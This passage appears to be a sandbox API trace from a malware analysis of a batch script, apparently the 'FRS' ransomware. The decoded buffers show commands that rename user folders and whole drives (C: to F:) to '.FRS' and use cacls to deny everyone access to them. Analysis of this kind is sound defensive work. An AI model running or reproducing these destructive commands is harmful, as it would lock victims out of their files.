hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0109.742] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0109.742] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0109.742] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.742] GetFileType (hFile=0x260) returned 0x1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0109.743] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.743] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.743] GetFileType (hFile=0x260) returned 0x1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.743] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0109.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0109.743] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.743] GetFileType (hFile=0x260) returned 0x1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0109.743] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0109.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0109.743] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.743] GetFileType (hFile=0x260) returned 0x1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0109.743] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0109.743] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0109.743] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.743] GetFileType (hFile=0x260) returned 0x1 [0109.743] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0109.743] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0109.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0109.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.744] GetFileType (hFile=0x260) returned 0x1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0109.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0109.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0109.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.744] GetFileType (hFile=0x260) returned 0x1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0109.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0109.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0109.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.744] GetFileType (hFile=0x260) returned 0x1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0109.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0109.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0109.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.744] GetFileType (hFile=0x260) returned 0x1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0109.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0109.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0109.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0109.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.745] GetFileType (hFile=0x260) returned 0x1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0109.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0109.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0109.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.745] GetFileType (hFile=0x260) returned 0x1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0109.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0109.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0109.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.745] GetFileType (hFile=0x260) returned 0x1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0109.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0109.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0109.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.745] GetFileType (hFile=0x260) returned 0x1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0109.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0109.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0109.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.745] GetFileType (hFile=0x260) returned 0x1 [0109.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0109.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0109.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0109.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.746] GetFileType (hFile=0x260) returned 0x1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0109.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0109.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0109.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.746] GetFileType (hFile=0x260) returned 0x1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0109.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0109.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0109.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.746] GetFileType (hFile=0x260) returned 0x1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0109.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0109.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0109.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.746] GetFileType (hFile=0x260) returned 0x1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0109.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0109.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0109.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.747] GetFileType (hFile=0x260) returned 0x1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0109.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0109.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0109.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.747] GetFileType (hFile=0x260) returned 0x1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0109.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0109.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0109.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.747] GetFileType (hFile=0x260) returned 0x1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0109.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0109.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0109.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.747] GetFileType (hFile=0x260) returned 0x1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0109.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0109.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0109.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0109.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.748] GetFileType (hFile=0x260) returned 0x1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0109.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0109.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls 